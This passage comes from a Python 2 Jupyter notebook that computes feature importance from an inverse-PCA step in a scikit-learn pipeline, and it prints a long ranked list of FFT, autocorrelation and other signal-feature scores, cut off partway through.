"def get_inv_pca_feat_imp(r, fs, subfs, commonfeats):\n# filenames = glob.glob(\"data/results\" + str(r) + \"/fs_\" + str(fs) + \"_subfs_\" + str(subfs) + \"_*.npz\")\n filenames = glob.glob(\"data/results\" + str(r) + \"/fs_\" + str(fs) + \"_subfs_\" + str(subfs) + \"_tr_\" + str(0) + \"_ts_\" + str(5) + \".npz\")\n print filenames\n feat_imp = np.zeros(len(commonfeats))\n for filn in filenames:\n # for every training surface\n model_file = np.load(filn)\n # get the corresponding model\n model = model_file['model'][0]\n # get the pca\n pca = model.named_steps['decomp']\n # get from the inverse pca the importance of each feature\n invpca = pca.inverse_transform(np.eye(20))\n # find the corresponding indexes returned by feature selection step\n model_feat_ind = list(model.named_steps['feature_selection'].get_support(indices = True))\n # use the commonfeats indexes to find the corresponding index inside model_feat_ind to reference invpca\n # and add its importance to feat_imp correctly\n for ci in range(len(commonfeats)):\n curr_ind = model_feat_ind.index(commonfeats[ci])\n feat_imp[ci] += np.mean(invpca[:,curr_ind])\n return feat_imp",
"_____no_output_____"
],
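[
"# Added note on the inverse-PCA trick above: for a fitted, non-whitened PCA,\n# inverse_transform(np.eye(k)) returns mean_ + components_, i.e. each row is one\n# principal axis expressed in the original (selected) feature space, so averaging\n# over rows scores each original feature's contribution. Quick sanity check:\n_pca = PCA(n_components=2).fit(np.random.rand(50, 5))\nprint(np.allclose(_pca.inverse_transform(np.eye(2)), _pca.mean_ + _pca.components_))",
"_____no_output_____"
],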
[
"### Example \nfs=0\nsubfs=3\nfor r in range(1,2):\n tot_feats, best_tot_feats, best_tot_scores = get_tot_feats(fs=0, subfs=subfs, r=r)\n common_feats, full_names = get_common_feats(bool_tot_feats=tot_feats, subfs=subfs, skip_surf=6, print_common_feats=0)\n fn = np.array(full_names)\n tmp = fn[:,0].astype(int).tolist()\n print np.array(featnames)[tmp]\n feat_imp = get_inv_pca_feat_imp(r,fs,subfs,common_feats)\n# print feat_imp\n plt.figure(figsize=(20,10))\n feat_imp_sort_ind = np.argsort(feat_imp)[::-1]\n feat_imp_sort = np.sort(feat_imp)[::-1]\n plt.plot(feat_imp_sort)\n for t in range(len(feat_imp_sort_ind)):\n print t, np.array(featnames)[tmp[feat_imp_sort_ind[t]]], feat_imp_sort[t]\n\n# for j in range(0,len(best_tot_feats),1):\n# tmpj = best_tot_feats[j][:5]\n# print len(tmpj)\n# print j, best_tot_scores[j][:10]\n# print j, np.array(featnames)[tmpj]\n ",
"['data/results1/fs_0_subfs_3_tr_0_ts_5.npz']\n===============================================================\n1000 common feats, out of 3107 total\nof which, 44 (4.40%) were Freq features and 956 (95.60%) were Time features\n===============================================================\n['intsgnl' 'meanabs' 'meanabsslp' 'ssi' 'var' 'rms' 'rng' 'mmnf' 'mmdf'\n 'reFFT000' 'reFFT001' 'reFFT002' 'reFFT003' 'reFFT004' 'reFFT005'\n 'reFFT006' 'reFFT007' 'reFFT008' 'reFFT009' 'reFFT010' 'reFFT011'\n 'reFFT012' 'reFFT015' 'reFFT016' 'reFFT017' 'reFFT018' 'imFFT003'\n 'imFFT004' 'imFFT006' 'imFFT008' 'imFFT009' 'imFFT010' 'imFFT011'\n 'imFFT012' 'imFFT021' 'imFFT023' 'imFFT028' 'imFFT029' 'imFFT034' 'meanv'\n 'stdr' 'mx' 'rngy' 'med' 'hjorth' 'se' 'acrol0000' 'acrol0001' 'acrol0002'\n 'acrol0003' 'acrol0004' 'acrol0005' 'acrol0006' 'acrol0007' 'acrol0008'\n 'acrol0009' 'acrol0010' 'acrol0011' 'acrol0012' 'acrol0013' 'acrol0014'\n 'acrol0015' 'acrol0016' 'acrol0017' 'acrol0018' 'acrol0019' 'acrol0020'\n 'acrol0021' 'acrol0022' 'acrol0023' 'acrol0024' 'acrol0025' 'acrol0026'\n 'acrol0027' 'acrol0028' 'acrol0029' 'acrol0030' 'acrol0031' 'acrol0032'\n 'acrol0033' 'acrol0034' 'acrol0035' 'acrol0036' 'acrol0037' 'acrol0038'\n 'acrol0039' 'acrol0040' 'acrol0041' 'acrol0042' 'acrol0043' 'acrol0044'\n 'acrol0045' 'acrol0046' 'acrol0047' 'acrol0048' 'acrol0049' 'acrol0050'\n 'acrol0051' 'acrol0052' 'acrol0053' 'acrol0054' 'acrol0055' 'acrol0056'\n 'acrol0057' 'acrol0058' 'acrol0059' 'acrol0060' 'acrol0061' 'acrol0062'\n 'acrol0063' 'acrol0064' 'acrol0065' 'acrol0066' 'acrol0067' 'acrol0068'\n 'acrol0069' 'acrol0070' 'acrol0071' 'acrol0072' 'acrol0073' 'acrol0074'\n 'acrol0075' 'acrol0076' 'acrol0077' 'acrol0078' 'acrol0079' 'acrol0080'\n 'acrol0081' 'acrol0082' 'acrol0083' 'acrol0084' 'acrol0085' 'acrol0086'\n 'acrol0087' 'acrol0088' 'acrol0089' 'acrol0090' 'acrol0091' 'acrol0092'\n 'acrol0093' 'acrol0094' 'acrol0095' 'acrol0096' 'acrol0097' 'acrol0098'\n 'acrol0099' 'acrol0100' 'acrol0101' 'acrol0102' 'acrol0103' 'acrol0104'\n 'acrol0105' 'acrol0106' 'acrol0107' 'acrol0108' 'acrol0109' 'acrol0110'\n 'acrol0111' 'acrol0112' 'acrol0113' 'acrol0114' 'acrol0115' 'acrol0116'\n 'acrol0117' 'acrol0118' 'acrol0119' 'acrol0120' 'acrol0121' 'acrol0122'\n 'acrol0123' 'acrol0124' 'acrol0125' 'acrol0126' 'acrol0127' 'acrol0128'\n 'acrol0129' 'acrol0130' 'acrol0131' 'acrol0132' 'acrol0133' 'acrol0134'\n 'acrol0135' 'acrol0136' 'acrol0137' 'acrol0138' 'acrol0139' 'acrol0140'\n 'acrol0141' 'acrol0142' 'acrol0143' 'acrol0144' 'acrol0145' 'acrol0146'\n 'acrol0147' 'acrol0148' 'acrol0149' 'acrol0150' 'acrol0151' 'acrol0152'\n 'acrol0153' 'acrol0154' 'acrol0155' 'acrol0156' 'acrol0157' 'acrol0158'\n 'acrol0159' 'acrol0160' 'acrol0161' 'acrol0162' 'acrol0163' 'acrol0164'\n 'acrol0165' 'acrol0166' 'acrol0167' 'acrol0168' 'acrol0169' 'acrol0170'\n 'acrol0171' 'acrol0172' 'acrol0173' 'acrol0174' 'acrol0175' 'acrol0176'\n 'acrol0177' 'acrol0178' 'acrol0179' 'acrol0180' 'acrol0181' 'acrol0182'\n 'acrol0183' 'acrol0184' 'acrol0185' 'acrol0186' 'acrol0187' 'acrol0188'\n 'acrol0189' 'acrol0190' 'acrol0194' 'acrol0195' 'acrol0196' 'acrol0197'\n 'acrol0198' 'acrol0199' 'acrol0200' 'acrol0201' 'acrol0202' 'acrol0203'\n 'acrol0204' 'acrol0205' 'acrol0206' 'acrol0208' 'acrol0209' 'acrol0213'\n 'acrol0214' 'acrol0215' 'acrol0216' 'acrol0217' 'acrol0218' 'acrol0220'\n 'acrol0221' 'acrol0223' 'acrol0224' 'acrol0227' 'acrol0228' 'acrol0229'\n 'acrol0230' 'acrol0231' 'acrol0232' 'acrol0233' 'acrol0234' 'acrol0235'\n 'acrol0236' 'acrol0237' 
'acrol0238' 'acrol0239' 'acrol0240' 'acrol0241'\n 'acrol0242' 'acrol0243' 'acrol0244' 'acrol0245' 'acrol0246' 'acrol0247'\n 'acrol0248' 'acrol0249' 'acrol0250' 'acrol0251' 'acrol0252' 'acrol0253'\n 'acrol0254' 'acrol0255' 'acrol0256' 'acrol0257' 'acrol0258' 'acrol0259'\n 'acrol0260' 'acrol0261' 'acrol0262' 'acrol0263' 'acrol0264' 'acrol0265'\n 'acrol0266' 'acrol0267' 'acrol0268' 'acrol0269' 'acrol0270' 'acrol0271'\n 'acrol0272' 'acrol0273' 'acrol0274' 'acrol0275' 'acrol0276' 'acrol0277'\n 'acrol0278' 'acrol0279' 'acrol0280' 'acrol0281' 'acrol0282' 'acrol0283'\n 'acrol0284' 'acrol0285' 'acrol0286' 'acrol0287' 'acrol0288' 'acrol0289'\n 'acrol0290' 'acrol0291' 'acrol0292' 'acrol0293' 'acrol0294' 'acrol0295'\n 'acrol0296' 'acrol0297' 'acrol0298' 'acrol0299' 'acrol0300' 'acrol0301'\n 'acrol0302' 'acrol0303' 'acrol0304' 'acrol0305' 'acrol0306' 'acrol0307'\n 'acrol0308' 'acrol0309' 'acrol0310' 'acrol0311' 'acrol0312' 'acrol0313'\n 'acrol0314' 'acrol0315' 'acrol0316' 'acrol0317' 'acrol0318' 'acrol0319'\n 'acrol0320' 'acrol0321' 'acrol0322' 'acrol0323' 'acrol0324' 'acrol0325'\n 'acrol0326' 'acrol0327' 'acrol0328' 'acrol0329' 'acrol0330' 'acrol0331'\n 'acrol0332' 'acrol0333' 'acrol0334' 'acrol0335' 'acrol0336' 'acrol0337'\n 'acrol0338' 'acrol0339' 'acrol0340' 'acrol0341' 'acrol0342' 'acrol0343'\n 'acrol0344' 'acrol0345' 'acrol0346' 'acrol0347' 'acrol0348' 'acrol0349'\n 'acrol0350' 'acrol0351' 'acrol0352' 'acrol0353' 'acrol0354' 'acrol0355'\n 'acrol0356' 'acrol0357' 'acrol0358' 'acrol0359' 'acrol0360' 'acrol0361'\n 'acrol0362' 'acrol0363' 'acrol0364' 'acrol0365' 'acrol0366' 'acrol0367'\n 'acrol0368' 'acrol0369' 'acrol0370' 'acrol0371' 'acrol0372' 'acrol0373'\n 'acrol0374' 'acrol0375' 'acrol0376' 'acrol0377' 'acrol0378' 'acrol0379'\n 'acrol0380' 'acrol0381' 'acrol0382' 'acrol0383' 'acrol0384' 'acrol0385'\n 'acrol0386' 'acrol0387' 'acrol0388' 'acrol0389' 'acrol0390' 'acrol0391'\n 'acrol0392' 'acrol0393' 'acrol0394' 'acrol0395' 'acrol0396' 'acrol0397'\n 'acrol0398' 'acrol0399' 'acrol0400' 'acrol0401' 'acrol0402' 'acrol0403'\n 'acrol0404' 'acrol0405' 'acrol0406' 'acrol0407' 'acrol0408' 'acrol0409'\n 'acrol0410' 'acrol0411' 'acrol0412' 'acrol0413' 'acrol0414' 'acrol0415'\n 'acrol0416' 'acrol0417' 'acrol0418' 'acrol0419' 'acrol0420' 'acrol0421'\n 'acrol0422' 'acrol0423' 'acrol0424' 'acrol0425' 'acrol0426' 'acrol0427'\n 'acrol0428' 'acrol0429' 'acrol0430' 'acrol0431' 'acrol0432' 'acrol0433'\n 'acrol0434' 'acrol0435' 'acrol0436' 'acrol0437' 'acrol0438' 'acrol0439'\n 'acrol0440' 'acrol0441' 'acrol0442' 'acrol0443' 'acrol0444' 'acrol0445'\n 'acrol0446' 'acrol0447' 'acrol0448' 'acrol0449' 'acrol0450' 'acrol0451'\n 'acrol0452' 'acrol0453' 'acrol0454' 'acrol0455' 'acrol0458' 'acrol0459'\n 'acrol0460' 'acrol0461' 'acrol0462' 'acrol0463' 'acrol0464' 'acrol0465'\n 'acrol0466' 'acrol0467' 'acrol0468' 'acrol0469' 'acrol0470' 'acrol0471'\n 'acrol0472' 'acrol0473' 'acrol0474' 'acrol0475' 'acrol0476' 'acrol0477'\n 'acrol0478' 'acrol0479' 'acrol0480' 'acrol0481' 'acrol0482' 'acrol0483'\n 'acrol0484' 'acrol0485' 'acrol0486' 'acrol0487' 'acrol0488' 'acrol0489'\n 'acrol0490' 'acrol0491' 'acrol0492' 'acrol0493' 'acrol0494' 'acrol0495'\n 'acrol0496' 'acrol0497' 'acrol0498' 'acrol0499' 'acrol0500' 'acrol0501'\n 'acrol0502' 'acrol0503' 'acrol0504' 'acrol0505' 'acrol0506' 'acrol0507'\n 'acrol0508' 'acrol0509' 'acrol0510' 'acrol0511' 'acrol0512' 'acrol0513'\n 'acrol0514' 'acrol0515' 'acrol0516' 'acrol0517' 'acrol0518' 'acrol0519'\n 'acrol0520' 'acrol0521' 'acrol0522' 'acrol0523' 'acrol0524' 'acrol0525'\n 'acrol0526' 'acrol0527' 
'acrol0528' 'acrol0529' 'acrol0530' 'acrol0531'\n 'acrol0532' 'acrol0533' 'acrol0534' 'acrol0535' 'acrol0536' 'acrol0537'\n 'acrol0538' 'acrol0539' 'acrol0540' 'acrol0541' 'acrol0542' 'acrol0543'\n 'acrol0544' 'acrol0545' 'acrol0546' 'acrol0547' 'acrol0548' 'acrol0549'\n 'acrol0550' 'acrol0551' 'acrol0552' 'acrol0553' 'acrol0554' 'acrol0555'\n 'acrol0556' 'acrol0557' 'acrol0558' 'acrol0559' 'acrol0560' 'acrol0561'\n 'acrol0562' 'acrol0563' 'acrol0564' 'acrol0565' 'acrol0566' 'acrol0567'\n 'acrol0568' 'acrol0569' 'acrol0570' 'acrol0571' 'acrol0572' 'acrol0573'\n 'acrol0574' 'acrol0575' 'acrol0576' 'acrol0577' 'acrol0578' 'acrol0579'\n 'acrol0580' 'acrol0581' 'acrol0582' 'acrol0583' 'acrol0584' 'acrol0585'\n 'acrol0586' 'acrol0587' 'acrol0588' 'acrol0589' 'acrol0590' 'acrol0591'\n 'acrol0592' 'acrol0593' 'acrol0594' 'acrol0595' 'acrol0596' 'acrol0597'\n 'acrol0598' 'acrol0599' 'acrol0600' 'acrol0601' 'acrol0602' 'acrol0603'\n 'acrol0604' 'acrol0605' 'acrol0606' 'acrol0607' 'acrol0608' 'acrol0609'\n 'acrol0610' 'acrol0611' 'acrol0612' 'acrol0613' 'acrol0614' 'acrol0615'\n 'acrol0616' 'acrol0617' 'acrol0618' 'acrol0619' 'acrol0620' 'acrol0621'\n 'acrol0622' 'acrol0623' 'acrol0624' 'acrol0625' 'acrol0626' 'acrol0627'\n 'acrol0628' 'acrol0629' 'acrol0630' 'acrol0631' 'acrol0632' 'acrol0633'\n 'acrol0634' 'acrol0635' 'acrol0636' 'acrol0637' 'acrol0638' 'acrol0639'\n 'acrol0640' 'acrol0641' 'acrol0642' 'acrol0643' 'acrol0644' 'acrol0645'\n 'acrol0646' 'acrol0647' 'acrol0648' 'acrol0649' 'acrol0650' 'acrol0651'\n 'acrol0652' 'acrol0653' 'acrol0654' 'acrol0655' 'acrol0656' 'acrol0657'\n 'acrol0658' 'acrol0659' 'acrol0660' 'acrol0661' 'acrol0662' 'acrol0663'\n 'acrol0664' 'acrol0665' 'acrol0666' 'acrol0667' 'acrol0668' 'acrol0669'\n 'acrol0670' 'acrol0671' 'acrol0672' 'acrol0673' 'acrol0674' 'acrol0675'\n 'acrol0676' 'acrol0677' 'acrol0678' 'acrol0679' 'acrol0680' 'acrol0681'\n 'acrol0682' 'acrol0683' 'acrol0684' 'acrol0685' 'acrol0686' 'acrol0687'\n 'acrol0688' 'acrol0689' 'acrol0690' 'acrol0691' 'acrol0692' 'acrol0693'\n 'acrol0694' 'acrol0695' 'acrol0696' 'acrol0697' 'acrol0698' 'acrol0699'\n 'acrol0700' 'acrol0701' 'acrol0702' 'acrol0703' 'acrol0704' 'acrol0705'\n 'acrol0706' 'acrol0707' 'acrol0708' 'acrol0709' 'acrol0710' 'acrol0711'\n 'acrol0712' 'acrol0713' 'acrol0714' 'acrol0715' 'acrol0716' 'acrol0717'\n 'acrol0718' 'acrol0719' 'acrol0720' 'acrol0721' 'acrol0722' 'acrol0723'\n 'acrol0724' 'acrol0725' 'acrol0726' 'acrol0727' 'acrol0728' 'acrol0729'\n 'acrol0730' 'acrol0731' 'acrol0732' 'acrol0733' 'acrol0734' 'acrol0735'\n 'acrol0736' 'acrol0737' 'acrol0738' 'acrol0739' 'acrol0740' 'acrol0741'\n 'acrol0742' 'acrol0743' 'acrol0744' 'acrol0745' 'acrol0746' 'acrol0747'\n 'acrol0748' 'acrol0749' 'acrol0750' 'acrol0751' 'acrol0752' 'acrol0753'\n 'acrol0754' 'acrol0755' 'acrol0756' 'acrol0757' 'acrol0758' 'acrol0759'\n 'acrol0760' 'acrol0761' 'acrol0762' 'acrol0763' 'acrol0764' 'acrol0765'\n 'acrol0766' 'acrol0768' 'acrol0769' 'acrol0780' 'acrol0785' 'acrol0786'\n 'acrol0787' 'acrol0788' 'acrol0789' 'acrol0790' 'acrol0791' 'acrol0792'\n 'acrol0793' 'acrol0794' 'acrol0795' 'acrol0796' 'acrol0797' 'acrol0798'\n 'acrol0799' 'acrol0800' 'acrol0801' 'acrol0802' 'acrol0803' 'acrol0804'\n 'acrol0805' 'acrol0806' 'acrol0807' 'acrol0809' 'acrol0811' 'acrol0812'\n 'acrol0813' 'acrol0814' 'acrol0815' 'acrol0816' 'acrol0817' 'acrol0818'\n 'acrol0819' 'acrol0820' 'acrol0821' 'acrol0822' 'acrol0823' 'acrol0824'\n 'acrol0825' 'acrol0826' 'acrol0827' 'acrol0828' 'acrol0829' 'acrol0830'\n 'acrol0831' 'acrol0832' 
'acrol0833' 'acrol0834' 'acrol0835' 'acrol0836'\n 'acrol0837' 'acrol0839' 'acrol0840' 'acrol0842' 'acrol0843' 'acrol0844'\n 'acrol0845' 'acrol0846' 'acrol0847' 'acrol0848' 'acrol0849' 'acrol0850'\n 'acrol0851' 'acrol0852' 'acrol0853' 'acrol0854' 'acrol0855' 'acrol0856'\n 'acrol0857' 'acrol0858' 'acrol0859' 'acrol0860' 'acrol0861' 'acrol0862'\n 'acrol0863' 'acrol0864' 'acrol0865' 'acrol0866' 'acrol0867' 'acrol0868'\n 'acrol0869' 'acrol0870' 'acrol0871' 'acrol0872' 'acrol0873' 'acrol0874'\n 'acrol0875' 'acrol0876' 'acrol0877' 'acrol0878' 'acrol0879' 'acrol0880'\n 'acrol0881' 'acrol0882' 'acrol0883' 'acrol0884' 'acrol0885' 'acrol0886'\n 'acrol0887' 'acrol0888' 'acrol0889' 'acrol0890' 'acrol0891' 'acrol0892'\n 'acrol0893' 'acrol0894' 'acrol0895' 'acrol0896' 'acrol0897' 'acrol0898'\n 'acrol0899' 'acrol0900' 'acrol0902' 'acrol0903' 'acrol0905' 'acrol0906'\n 'acrol0907' 'acrol0908' 'acrol0909' 'acrol0910' 'acrol0911' 'acrol0912'\n 'acrol0913' 'acrol0914' 'acrol0915' 'acrol0916' 'acrol0917' 'acrol0918'\n 'acrol0920' 'acrol0922' 'acrol0926' 'acrol0927' 'acrol0928' 'acrol0929'\n 'acrol0930' 'acrol0931' 'acrol0932' 'acrol0933' 'acrol0934' 'acrol0935'\n 'acrol0936' 'acrol0937' 'acrol0938' 'acrol0939' 'acrol0940' 'acrol0941'\n 'acrol0942' 'acrol0943' 'acrol0944' 'acrol0945' 'acrol0946' 'acrol0947'\n 'acrol0948' 'acrol0949' 'acrol0950' 'acrol0951' 'acrol0952' 'acrol0953'\n 'acrol0954' 'acrol0955' 'acrol0956' 'acrol0957' 'acrol0958' 'acrol0959'\n 'acrol0960' 'acrol0961' 'acrol0962' 'acrol0963' 'acrol0964' 'acrol0965'\n 'acrol0966' 'acrol0967' 'acrol0968' 'acrol0969' 'acrol0970' 'acrol0971'\n 'acrol0972' 'acrol0973' 'acrol0974' 'acrol0975' 'acrol0976' 'acrol0977'\n 'acrol0978' 'acrol1020' 'acrol1021' 'amFFT000' 'amFFT008' 'amFFT009'\n 'amFFT010' 'amFFT011' 'amFFT012' 'phFFT000' 'phFFT008' 'phFFT009'\n 'phFFT010' 'phFFT011' 'phFFT012']\n['data/results1/fs_0_subfs_3_tr_0_ts_5.npz']\n0 reFFT010 0.0766293408706\n1 reFFT018 0.0447414833478\n2 reFFT004 0.0435756307039\n3 mmdf 0.0427619960262\n4 phFFT012 0.0409017707002\n5 mmnf 0.0398151146058\n6 phFFT009 0.0391392334455\n7 phFFT011 0.037165513411\n8 phFFT010 0.0342619814778\n9 phFFT008 0.0341353010342\n10 reFFT017 0.0308057578195\n11 amFFT012 0.0304204922638\n12 stdr 0.0292270519868\n13 reFFT009 0.0240039463317\n14 amFFT009 0.0221175965759\n15 rng 0.022048362632\n16 rngy 0.022048362632\n17 hjorth 0.0219253534307\n18 amFFT011 0.0198409229263\n19 reFFT015 0.0187915593818\n20 amFFT010 0.0182735340709\n21 amFFT008 0.0175001756734\n22 reFFT016 0.0165941225547\n23 reFFT002 0.00653771301826\n24 acrol0032 0.00340014577388\n25 acrol0031 0.00340013319156\n26 acrol0033 0.00340006155269\n27 acrol0030 0.00340001154337\n28 acrol0034 0.00339986928283\n29 acrol0029 0.00339986311755\n30 acrol0028 0.00339962581376\n31 acrol0035 0.00339961364424\n32 acrol0027 0.00339932175299\n33 acrol0036 0.00339927996672\n34 acrol0026 0.00339890435312\n35 acrol0037 0.00339886889514\n36 acrol0025 0.00339844385987\n37 acrol0038 0.00339835666302\n38 acrol0024 0.00339785363518\n39 acrol0039 0.00339773935668\n40 acrol0023 0.00339731398713\n41 acrol0040 0.0033970942003\n42 acrol0022 0.00339664286186\n43 acrol0041 0.00339630493581\n44 acrol0021 0.00339594798976\n45 acrol0042 0.00339541909452\n46 acrol0020 0.00339508366624\n47 acrol0043 0.003394449804\n48 acrol0019 0.00339422193922\n49 acrol0044 0.00339333469331\n50 acrol0018 0.00339331132714\n51 acrol0017 0.0033923844778\n52 acrol0045 0.00339213678646\n53 acrol0016 0.00339145191175\n54 acrol0046 0.00339086292815\n55 acrol0015 0.00339048089589\n56 
acrol0014 0.00338946088926\n57 acrol0047 0.00338943214227\n58 acrol0013 0.00338846063886\n59 acrol0048 0.00338796374664\n60 acrol0012 0.0033874741378\n61 acrol0011 0.00338645068003\n62 acrol0049 0.00338637249578\n63 acrol0010 0.00338548139388\n64 acrol0050 0.00338470110041\n65 acrol0009 0.00338450441255\n66 acrol0008 0.0033835589125\n67 acrol0051 0.00338294317041\n68 acrol0007 0.00338259942963\n69 acrol0006 0.00338162777416\n70 acrol0052 0.00338116625971\n71 acrol0005 0.00338072451587\n72 acrol0004 0.00337980966957\n73 acrol0053 0.00337926344988\n74 acrol0003 0.00337892611007\n75 acrol0002 0.00337801551798\n76 acrol0054 0.0033773530283\n77 acrol0001 0.00337711918594\n78 se 0.00337628133105\n79 ssi 0.00337628133105\n80 acrol0000 0.00337628133105\n81 var 0.00337628133105\n82 acrol0055 0.0033753646736\n83 acrol0056 0.00337335037384\n84 acrol0057 0.00337123229495\n85 acrol0058 0.00336904338874\n86 acrol0059 0.00336683858823\n87 acrol0060 0.00336449503489\n88 acrol0061 0.00336216789163\n89 acrol0062 0.00335975362529\n90 acrol0063 0.00335737992064\n91 acrol0064 0.00335487484311\n92 acrol0065 0.00335235007025\n93 acrol0066 0.00334975492777\n94 acrol0067 0.00334718545701\n95 acrol0068 0.00334454413031\n96 acrol0069 0.00334188317042\n97 acrol0070 0.00333925279626\n98 acrol0071 0.00333659329207\n99 acrol0072 0.00333389265225\n100 acrol0073 0.00333115022255\n101 acrol0074 0.00332844142271\n102 acrol0075 0.0033257281867\n103 acrol0076 0.00332300757562\n104 acrol0077 0.00332025757737\n105 acrol0078 0.00331751716552\n106 acrol0079 0.0033147416914\n107 acrol0080 0.00331198657774\n108 acrol0081 0.0033092046539\n109 acrol0082 0.00330640884562\n110 acrol0083 0.00330362061947\n111 acrol0084 0.00330086759701\n112 acrol0085 0.00329801628173\n113 acrol0086 0.00329511541027\n114 acrol0087 0.00329228582721\n115 acrol0088 0.00328937272865\n116 acrol0089 0.00328650235901\n117 acrol0090 0.00328349980116\n118 acrol0091 0.00328050085726\n119 acrol0092 0.00327750205723\n120 acrol0093 0.00327442366333\n121 acrol0094 0.00327134130687\n122 acrol0095 0.00326824757775\n123 acrol0096 0.00326510570231\n124 acrol0097 0.00326198090682\n125 acrol0098 0.00325879531535\n126 acrol0099 0.00325566151283\n127 acrol0100 0.00325247761694\n128 acrol0101 0.00324926223733\n129 acrol0102 0.00324604936978\n130 acrol0103 0.00324280360982\n131 acrol0104 0.00323959940934\n132 acrol0105 0.00323630807866\n133 acrol0106 0.00323303320614\n134 acrol0107 0.00322976883152\n135 acrol0108 0.00322646478929\n136 acrol0109 0.00322323502859\n137 acrol0110 0.00322001007512\n138 acrol0111 0.00321673326776\n139 acrol0112 0.00321357835145\n140 acrol0113 0.00321035439503\n141 acrol0114 0.00320720906884\n142 acrol0115 0.00320409237246\n143 acrol0116 0.00320109640294\n144 acrol0117 0.00319811969749\n145 acrol0118 0.00319523084868\n146 acrol0119 0.00319244085766\n147 acrol0120 0.00318970218864\n148 acrol0121 0.00318707462348\n149 acrol0122 0.00318461959591\n150 acrol0123 0.00318225052029\n151 acrol0171 0.00318036236512\n152 acrol0172 0.00318031896645\n153 acrol0170 0.00318027090269\n154 acrol0173 0.00318018501354\n155 acrol0169 0.00318006473636\n156 acrol0124 0.00317996504254\n157 acrol0174 0.0031799630715\n158 acrol0168 0.00317975626255\n159 acrol0175 0.00317954298357\n160 acrol0167 0.00317940996668\n161 acrol0176 0.00317901739831\n162 acrol0166 0.00317888286614\n163 acrol0177 0.00317838246418\n164 acrol0165 0.00317836498014\n165 acrol0125 0.00317785556424\n166 acrol0164 0.0031777668953\n167 acrol0178 0.00317764800404\n168 acrol0163 0.00317712574209\n169 acrol0179 
0.00317668496886\n170 acrol0162 0.00317642302892\n171 acrol0126 0.00317582815273\n172 acrol0180 0.00317570187115\n173 acrol0161 0.00317566860898\n174 acrol0160 0.00317483553278\n175 acrol0181 0.0031746081007\n176 acrol0159 0.00317404057154\n177 acrol0127 0.00317398350265\n178 acrol0182 0.00317337846576\n179 acrol0158 0.00317317216478\n180 acrol0157 0.00317233710683\n181 acrol0128 0.00317220349251\n182 acrol0183 0.00317202163442\n183 acrol0156 0.00317141039729\n184 acrol0129 0.00317057296704\n185 acrol0155 0.00317050246336\n186 acrol0184 0.00317049177988\n187 acrol0154 0.0031695881597\n188 acrol0130 0.00316911244831\n189 acrol0185 0.00316894330036\n190 acrol0153 0.0031686495305\n191 acrol0152 0.00316777317592\n192 acrol0131 0.00316772098472\n193 acrol0186 0.0031672553976\n194 acrol0151 0.00316687550567\n195 acrol0132 0.00316644831852\n196 acrol0150 0.00316596885591\n197 acrol0187 0.00316546929052\n198 acrol0133 0.00316528146392\n199 acrol0149 0.00316513131769\n200 acrol0148 0.00316437747951\n201 acrol0134 0.00316432510959\n202 acrol0147 0.0031636414099\n203 acrol0188 0.00316354111148\n204 acrol0135 0.00316351420327\n205 acrol0146 0.00316298301971\n206 acrol0136 0.00316278329427\n207 acrol0145 0.00316244259434\n208 acrol0137 0.00316221335902\n209 acrol0144 0.00316202299333\n210 acrol0138 0.00316172623487\n211 acrol0143 0.00316163889731\n212 acrol0189 0.00316154598508\n213 acrol0142 0.00316138659466\n214 acrol0139 0.0031613565086\n215 acrol0140 0.00316123647067\n216 acrol0141 0.00316121200102\n217 acrol0190 0.00315943434892\n218 acrol0194 0.00314964298804\n219 acrol0195 0.00314694037402\n220 acrol0196 0.00314401986302\n221 acrol0197 0.00314105488245\n222 acrol0198 0.00313793308538\n223 acrol0199 0.00313476762783\n224 acrol0200 0.00313148739651\n225 acrol0201 0.00312803396944\n226 acrol0202 0.00312444809825\n227 acrol0203 0.00312079671851\n228 acrol0204 0.00311697036119\n229 acrol0205 0.00311304148549\n230 acrol0206 0.00310902873511\n231 acrol0208 0.00310065305243\n232 acrol0209 0.00309628764064\n233 acrol0213 0.00307800474017\n234 acrol0214 0.00307323527626\n235 acrol0215 0.00306841582697\n236 acrol0216 0.00306345857308\n237 acrol0217 0.00305847355468\n238 acrol0218 0.00305341389412\n239 acrol0220 0.00304322103087\n240 acrol0221 0.00303809691734\n241 acrol0223 0.00302758532291\n242 acrol0224 0.00302231603066\n243 acrol0227 0.00300656724293\n244 acrol0228 0.00300135224791\n245 acrol0229 0.00299608620809\n246 acrol0230 0.00299091779968\n247 acrol0231 0.00298572392226\n248 acrol0232 0.00298062501718\n249 acrol0233 0.00297550534133\n250 acrol0234 0.00297047696242\n251 acrol0235 0.00296539794933\n252 acrol0236 0.00296041249555\n253 acrol0237 0.00295554992247\n254 acrol0238 0.00295068783164\n255 acrol0239 0.00294586170353\n256 acrol0240 0.00294116274541\n257 acrol0241 0.00293654168268\n258 acrol0242 0.00293199036896\n259 acrol0243 0.00292740968881\n260 acrol0244 0.00292294756328\n261 acrol0245 0.00291854973241\n262 acrol0246 0.00291418173322\n263 acrol0247 0.00290986080057\n264 acrol0248 0.00290555371274\n265 acrol0249 0.00290141458441\n266 acrol0250 0.00289724182417\n267 acrol0251 0.00289302725413\n268 acrol0252 0.00288887419935\n269 acrol0253 0.00288474527645\n270 acrol0254 0.00288059959492\n271 acrol0255 0.00287649802138\n272 acrol0256 0.00287234815878\n273 acrol0257 0.0028682296794\n274 acrol0258 0.0028640925749\n275 acrol0259 0.00286003940513\n276 acrol0260 0.00285586930717\n277 acrol0261 0.00285162641353\n278 acrol0262 0.00284743609044\n279 acrol0263 0.00284323788204\n280 acrol0264 
0.00283908618992\n281 acrol0265 0.00283478759578\n282 acrol0266 0.00283048790098\n283 acrol0267 0.00282610829701\n284 acrol0268 0.0028218418708\n285 acrol0269 0.00281743425906\n286 acrol0270 0.00281304095166\n287 acrol0271 0.00280860463869\n288 acrol0272 0.00280415890364\n289 acrol0273 0.00279961246926\n290 acrol0274 0.00279510879442\n291 acrol0275 0.00279051132366\n292 acrol0276 0.00278594474607\n293 acrol0277 0.00278129288879\n294 acrol0278 0.00277662744558\n295 acrol0279 0.00277191072685\n296 acrol0280 0.00276716851282\n297 acrol0281 0.00276238474118\n298 acrol0282 0.00275759132269\n299 acrol0283 0.00275273773762\n300 acrol0284 0.00274791142243\n301 acrol0285 0.00274301085421\n302 acrol0286 0.00273807423522\n303 acrol0287 0.00273318141075\n304 acrol0288 0.00272828210718\n305 acrol0289 0.00272337662028\n306 acrol0290 0.00271842682674\n307 acrol0291 0.00271352036768\n308 acrol0292 0.00270866672364\n309 acrol0293 0.00270381622681\n310 acrol0294 0.00269887043327\n311 acrol0295 0.00269397867114\n312 acrol0296 0.00268907118885\n313 acrol0297 0.0026842507489\n314 acrol0298 